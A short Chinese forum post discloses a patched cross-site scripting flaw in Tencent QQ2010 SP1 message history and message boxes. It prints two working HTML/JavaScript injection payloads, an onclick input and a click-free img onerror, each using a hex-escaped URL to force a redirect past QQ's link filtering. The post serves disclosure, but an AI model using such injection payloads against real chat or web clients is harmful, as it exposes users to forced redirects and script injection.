腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010Sp1竟然有如此大漏洞。
##脚本出错还会提示
1、消息记录的Javascript、Html标签没有屏蔽
2、消息盒子Javascript、Html标签没有屏蔽
3、小实验
发送代码:<input onclick="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’" />
因为腾讯会自动将url转换,我们必须混淆url才能发送
4、超牛代码
<img src=’tetet’ onerror="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’"/>
因为要点击才能触发,想到一个不用点击就能触发的代码。
5、希望腾讯快点修复,这个漏洞非同小可
6、本漏洞由TGL发现。
注意,本代码仅供研究之用,请勿用于违法事情。
腾讯的危机应急能力很高。在14:56:32秒已经打包新版本并在首页提供下载。一个小风波就在几个小时静悄悄的来,静悄悄的走了。
希望腾讯以后也不要犯低级错误咯,如果还发现有Bug,可以重新下载QQ2010 SP1。
MsgMgr.dll是元凶,已经在14:02:54秒重新签名,漏洞提交给腾讯为早上9点。
![[万能驱动]深度](http://bbs.piaoyun.net/attachment/mini/f5a9e12ce8.png "[万能驱动]深度")
![[深度完美]Win11](http://bbs.piaoyun.net/attachment/mini/1924f91eeb.png "[深度完美]Win11")
